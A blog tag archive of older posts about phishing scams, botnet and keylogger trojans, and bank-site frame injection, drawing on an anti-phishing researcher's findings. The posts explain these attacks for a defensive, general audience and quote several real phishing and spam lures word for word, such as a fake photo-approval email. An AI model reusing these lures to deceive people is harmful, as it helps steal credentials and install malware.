Tag Archives: Daniel McNamara

The Phisher King is Back

I’m glad to report Australian phisher king Daniel McNamara has revived his Code Phish website which dissects phishing attacks and associated scams. He’s just taken a close peek at one ‘mule ad’ (as I call them) or job scam as he calls them: DHL Mail Job Scam.  These are efforts by the phishers to repatriate their illicit earnings by hiring unsuspecting individuals to let the stolen funds pass through their accounts. It seems that Eastern Europe is still the main source of such scams:

What’s really interesting however is where this scam is located. It’s sitting on the same hoster as the Ukrainian National Animal Welfare Foundation Job Scam and the GlobalFinances Job Scam. This would indicate they are mostly likely all being run by the same gang. The hoster is probably unaware of these sites scam status but we have seen them used numerous times over the last year to host scam sites which would indicate they most likely offer some sort of “get hosting working in minutes!” automatic setup for payments by credit cards and if it’s one things phishers have steady access to, it’s stolen credit card details.

Welcome back, Daniel.

Fame At Last, Or Under Attack?

Here’s an example of how social engineering can be more important than technical sophistication.

It’s an email with a credible from address, credible header, credible subject line, credible contents:

From: john@flexiprint.co.uk
Subject: Photo Approval Needed


Your photograph was forwarded to us as part of an article we are publishing for our May edition of Business Monthly.  Can you check over the format and get back to us with your approval or any changes you would like.  If the photograph is not to your liking then please attach a preferred one.

Kind regards,

John Andrews
Dept Marketing

Attached is a zip file, photo-approval-needed.zip. Inside the zip file is a screen-saver executable, which, according to CodePhish’s Daniel McNamara, is an IRC trojan for building a botnet. In English this means compromising the victim’s computer so it can be controlled remotely to send spam, viruses and stuff. The compromised computer is called a zombie and the big collection of remotely controlled zombies is called a botnet.

While Daniel says the trojan is not that sophisticated it does do a pretty good job of turning off Windows XP’s firewall turning it, in his words, “into Swiss cheese”.

I’m more impressed, however, at the social engineering. Who wouldn’t wonder whether the picture might contain a picture of them, and why wouldn’t they be written up in Flexiprint’s Business Monthly? Only by opening the zip file, or by checking out Flexiprint’s website (which resolves to business Internet solutions provider altoHiway), would the recipient start sniffing a rat.

This goes to underline a point that is sometimes skated over in advice given to the casual Internet user: It’s not enough to scour a suspicious email for bad grammar, odd formatting or strange header fields. Sometimes these give up few clues. Best rule of thumb is: If you’re not expecting an email from the sender, be suspicious.

Putting Phishers In The Banking Frame

Phishers are smart, and banks are dumb. At least, it seems that way. Here’s another example of what’s called a cross site scripting vulnerability attack, which basically lures the victim to what seems, both in the phishing email and in the website it links to, to be a genuine website belonging to Charter One Bank.

My phishing guru Daniel McNamara explains that the long URL — which begins with a legitimately looking http://www.charterone.com and contains none of the usual hidden URLs further down the URL — actually contains a link to a frame, which “effectively allows the phishers to load a frame containing their site withing the real charterone site”. This frame appears in the browser inside the legitimate page http://www.charterone.com/legalcenter/do_not_solicit_confirm.asp . It looks like this:


I’m going to run this by CharterOne to see what they have to say about it, but as Daniel points out, “it’s a pretty bad failing. a fairly common one unfortunately.”

Phishing Gets Proactive

Scaring the bejesus out of a lot of security folk this weekend is a new kind of phishing attack that doesn’t require the victim to do anything but visit the usual websites he might visit anyway.

It works like this: The bad guy uses a weakness in web servers running  Internet Information Services 5.0 (IIS) and Internet Explorer, components of Microsoft Windows, to make it append some JavaScript code to the bottom of webpages. When the victim visits those pages the JavaScript will load onto his computer one or more trojans, known variously as Scob.A, Berbew.F, and Padodor. These trojans open up the victim’s computer to the bad guy, but Padodor is also a keylogging trojan, capturing passwords the victim types when accessing websites like eBay and PayPal. Here’s an analysis of the malicious script placed on victims’ computers from LURHQ. Think of it as a kind of outsourced phishing attack.

Some things are not yet clear. One is how widespread this infection is. According to U.S.-based iDEFENSE late Friday, “hundreds of thousands of computers have likely been infected in the past 24 hours.” Others say it’s not that widespread. CNET reported late Friday that the Russian server delivering the trojans was shut down, but that may only be temporary respite.

What’s also unclear is exactly what vulnerability is being used, and therefore whether Microsoft has already developed a patch — or software cure — for it. More discussion on that here. Microsoft is calling the security issue Download.Ject, and writes about it here.

Although there’s no hard evidence, several security firms, including Kaspersky, iDEFENSE and F-Secure, are pointing the finger at a Russian-speaking hacking group called the HangUP Team.

According to Kaspersky Labs, we may be looking at what is called a Zero Day Vulnerability. In other words, a hole “which no-one knows about, and which there is no patch for”. Usually it has been the good guys — known in the trade as the white hats — who discover vulnerabilities in software and try to patch them before they can be exploited, whereas this attack may reflect a shift in the balance of power, as the bad guys (the black hats) find the vulnerabilities first, and make use of them while the rest of us try to find out how they do it. “We have been predicting such an incident for several years: it confirms the destructive direction taken by the computer underground, and the trend in using a combination of methods to attack. Unfortunately, such blended threats and attacks are designed to evade the protection currently available,” commented Eugene Kaspersky, head of Anti-Virus Research at Kaspersky Labs.

In short, what’s scary about this is:

  • we still don’t know exactly how servers are getting infected. Everyone’s still working on it;
  • suddenly surfing itself becomes dangerous. It’s no longer necessary to try to lure victims to dodgy websites; you just infect the places they would visit anyway;
  • Users who have done everything right can still get infected: Even a fully patched version of Internet Explorer 6 won’t save you from infection, according to Netcraft, a British Internet security company.

For now, all that is recommended is that you disable JavaScript. This is not really an option, says Daniel McNamara of anti-phishing website CodePhish, since a lot of sites rely on JavaScript to function. A better way, according to iDEFENSE, would be to use a non-Microsoft browser. Oh, and if you want to check whether you’re infected, according to Microsoft, search for the following files on your hard disk: kk32.dll and surf.dat. If either are there, you’re infected and you should run one of the clean-up tools listed on the Microsoft page.

Spam And Social Engineering

(Please see a subsequent post on this: Apologies for getting it wrong and thanks to everyone for writing in)

Spam always surprises.

This morning I got an HTML email from seemingly credible email address with just one line in it: http://drs.yahoo.com/jeremywagstaff.com/NEWS

Hmmm, I thought, my name! I was almost going to click it, but then decided to forward it to Daniel McNamara, who monitors this kind of thing on his website Code Fish. He called it “really weird porn spam”. The link in the HTML in fact goes to:

My browser, Daniel says, will ignore anything before the * so the remaining link is:

Everything after the # symbol is just an internal page reference so we can ignore that as well, leaving: http://www.security-warning.biz/personal6/maljo24/

Daniel says going to that page will redirect us to:

Buried in that page is a small graphic that is a simple counter. This page then opens a pop up window that goes to Danni’s Hard drive (apparently a well known porn site). Daniel writes: “This redirect includes the linker’s ID so they get cash from Danni’s for each referal. So, weird but effective. They don’t care if you hang around on the site just that you followed the link and made them money.”

Ugh. One final point from Daniel: The spam script inserts the recipient’s domain into the link to make it appear more relevant – in this case, jeremywagstaff.com. It was nearly enough for me.

A good example of how social engineering doesn’t need to be fancy to work.

Phishers Raise The Bar

Phishers can now access banking websites that use an extra ‘keylog-proof’ security layer.

For several months phishers — folk fooling you into giving up valuable passwords — have used keylogging software which will capture passwords and user names as you type them into banking and other financially-oriented sites. But these aren’t much use against websites that use extra layers of security that don’t require the user to type anything, but instead click on something. At Britain’s Barclays bank, for example, users are required to select from a list two letters matching a pre-selected secret word. Keyloggers aren’t any use against this, since there’s no keyboard clicking taking place and so no letters or numbers to capture.

Enter a key kind of phishing trojan, documented by the ever vigilant Daniel McNamara of Code Fish. While capturing keystrokes like other keylogging trojans, this one also captures screen shots (images of whatever is on the screen) and sends them along to a Russian email address. It captures a host of other goodies too, including whatever text the user happens to copy to the clipboard while they’re accessing the banking website in question (A smart move: Users often copy their password to the clipboard and then paste it into the appropriate field.) The target in this case? Barclays bank.

As Daniel points out, it seems as if this trojan has already been spotted. Symantec and other anti-virus vendors have in the past week referred to it, or something like it, calling it, variously, Bloodhound.Exploit.6, W32/Dumaru.w.gen, Exploit-MhtRedir and Backdoor.Nibu.D. And Barclays may be referring to the scam when it warns its users that “Some customers have been receiving an email claiming to be from Barclays advising them to follow a link to what appear to be a Barclays web site, where they are prompted to enter their personal Online Banking details.” (Although in fact the email in question doesn’t do this: It disguises itself as a web hosting receipt, and makes no mention of Barclays or online banking. The victim is instead lured by curiosity to a link in the email which takes them to a website that downloads the trojan in question.)

But none of these messages indicate the seriousness of this escalation. Whether this phishing trojan is just a proof of concept or specific attack against Barclays, it should send some serious warning signals through both the anti-virus industry and the online banking world. Phishers are getting smarter, and getting smarter quick. As Daniel himself writes, “This is a huge step in the phisher trojan evolution…This well-designed trojan should make anyone who has complete faith in visual selection systems a little bit worried.”

Beware the phisher’s revenge

Australian Daniel McNamara, who runs the hugely informative anti-phishing website Code Fish Spam Watch says he was today the victim of an attack on his website and his character, by a phishing email.

The email, spammed all around, pretends to be from him and says,  Dear Online Banking User, You should be heard about such called interned scam, also called phishing – the activity, aimed to stole your personal details. Possibly you already seen letters, asking you to verify your personal bank account details, reactivate it, or to stop illegal payment…

It then goes on to say more information can be found at his website of that of the Australian Federal Police. Of course the links don’t go there, they go to a website that, for IE users, downloads a trojan, which (probably) installs a program to log keystrokes and mail passwords back to the originator.

The phishing email not only seeks to implicate Daniel by delivering a trojan with his name in the email, it also overloads his servers. Since the email spoofs his email as the return address, those emails that do not reach their destination bounce back to his inbox. He says he has had to turn off his email server because of the traffic.

Daniel has been at the forefront of recording and investigating the phishing phenomenon, and has clearly attracted the ire of those involved. He tells me he believes it’s the same people who left a hidden message in a recent phishing email directed at Westpac; the message implied somehow Daniel and Codefish were involved in the scam. Daniel believes he “really managed to nark them.”

This kind of thing shows that one guy like Daniel can make a difference, simply by cataloging phishing attacks, since he’s provoked their authors into what appears to be a somewhat inept attempt at revenge. It’s a shame more people aren’t doing this kind of sleuth work.

The Maibach Mystery

Spam, scam, smear or did someone really buy earthenware and a bomb?

You may have recently received a copy of what looks to be weird spam:

You’ve just purchased set of Maibach brand earthenware on web site cvv2.ru
Easy to use, Maibach kitchenware is also famous for its modern look.
Our utensils, designed for easy and fast cooking of a variety of foods, will lower your energy consumption rate and save your time and money.

It goes on to trumpet the quality of Maibach’s kitchenware before offering a bonus:

1. Sony VHS cassette with 240 minutes of best underage porno you ever see. (NTSC and Secam both are available)
2. Bestselling manual “How to create plastic bomb in home” and “How to hijack a train or an aircraft, with color pictures and FAQ”

Needless to say, you might be somewhat alarmed by this. Did you buy some earthenware? Is someone using your credit card to buy earthenware? And what is a kitchenware manufacturer doing selling child pornography and bomb-making literature?

Well, it’s a puzzle. Mailbach does exist: It’s a Russian kitchenware manufacturer, and much of the blurb in the email comes direct from their website. The email looks as if it comes from a Russian ISP called RBC, and mentions in the header a website called CVV2.ru, which is a site for hackers and carders run by a guy called Don.

Daniel McNamara of Code Fish Spam Watch reckons it’s ”a fake email designed to get this carder site and its supporting network in trouble. We don’t think this has been sent out by any vigilante group and feel that it’s more likely that a rival carder gang is doing it in order to reduce competition. Our inboxes are simply victims of the crossfire in this turf war.”

I think he’s right. But it’s a weird one all the same.

Visual Spoofing And The Art of The Sting

Here’s a potential scam that raises the bar — and alarum bells — for everyone. It’s already got a name: Visual Spoofing.

It works like this (I think): Instead of ne’er-do-wells concealing addresses to make you think you’re at a legit website (say your bank, or PayPal) rather than at their sleazy password-grabbing site — what’s called phishing — why not just fake everything? And I mean everything?

The guy who developed this idea is called Don Park, and he’s posted a demo on his website to show what phishers could do. Basically a window pops up which looks like a PayPal site — much as a normal scam might — but which looks more authentic, because the website address looks solid, because there’s a lock in the bottom right hand corner to suggest it’s secure, and because all the main bits of it are actually fake. They are images of locks, images of website addresses (or at least, the box that contains the text is). It’s like a mirage, or a Potemkin Village, or a website. Nothing of what you see is real.

Don puts it like this: ”Most of the readers who saw the demo thought of it as a hole in the browser code.  Yes, there is a hole in the browser, one that allows scripts to hide and replace key UI components such as the toolbar used to display URL of the page and the statusbar used to display the golden lock.  But there also a hole in our brain…”

He goes on: “You see, the computer screen you are seeing this post with is actually showing just a rectangular array of pixels. There are no such thing as windows or buttons.  Instead, there are pixel patterns we call windows or buttons.  It is us, the users, who associate the idea of windows and buttons to those patterns of pixels.”

It’s a scary proposition. It’s like the fake betting shop in The Sting, or any number of movies (The Recruit, Mission Impossible) where the mark is convinced that what he is seeing, the place he is in, is real. What Don has shown us is that because we look for familiar things on a webpage — an URL bar, a status bar at the bottom, forward and back buttons — we feel comfortable when we see them. Only they’re not real. As Daniel McNamara of Code Fish put it to me: “Nothing is being exploited other than the human mind.”

It’s only a matter of time before real bad people, as opposed to the good guys, start to play around with this. Daniel again: Now that Microsoft has plugged one of the main holes that phishers used — hiding website addresses at the end of strings of gobbledigook — “this may be the new evolution stage of phishers”. 

Phishing and Keylogging – The Missing Link?

Here’s evidence that ‘phishing’ – the art of conning users into handing over banking and other passwords by fake, but convincing-looking emails and website — may have branched out into viruses and worms.

Symantec, McAfee and Sophos have published details of a new virus/trojan called Stawin (also known, because the anti virus people don’t seem to be able to standardise these things, as Keylog-Stawin, Troj/Stawin-or Keylogger.Stawin) which appears to have originated in Russia, and which, once installed, will sniff for any banking transactions from about 30 banks or online payment systems in the U.S., Australia and Canada, and will capture passwords and whatnot which it will then email, from time to time, to the hacker.

It does this via an email attachment with, usually, the title ‘I still love you’ — something that’s always nice to hear. If the email attachment — message.zip — is opened a small piece of software called a keylogger will install itself and look for the user opening a window with text in its title that matches any of about 60 different words, ranging from Westpac to Hyperwallet. The keylogger will record anything the user types into that window, store it, and occasionally email it to someone — apparently in Russia, since the email address is govnodav2004@mail.ru. (You won’t see this happening because the email is not sent via an email program but an inbuilt SMTP engine.)

The bad news: You don’t actually need to get the email version of this to be infected. Variants of the trojan could be received just be viewing a certain webpage, on an instant messaging chat network, or on a file sharing network.

Now we already knew, thanks to the work of folk like Daniel McNamara of Code Fish, that some phishing scam emails appeared to be trying to load keylogger trojans. But this seems to be the first industrial-strength one that targets a wide range of banks and online institutions. Says Daniel, who pointed it out to me: “This is certainly the first key logger one I’ve seen go to such lengths, particulary since it targets a wide range of English-speaking banks/financial institutions.” Most previous keyloggers, he says, tend to focus on one or two banks, usually from Asia or South America.

So is this proof that Russians are behind the bigger phishing scams? Or is this all just a ruse? That email address appears to be Russian, and not just because of the server.  Nick FitzGerald of Computer Virus Consulting says in a posting at SecurityFocus that he is informed by a Russian colleague that the email address is “rather crude if transliterated back into Cyrillic”.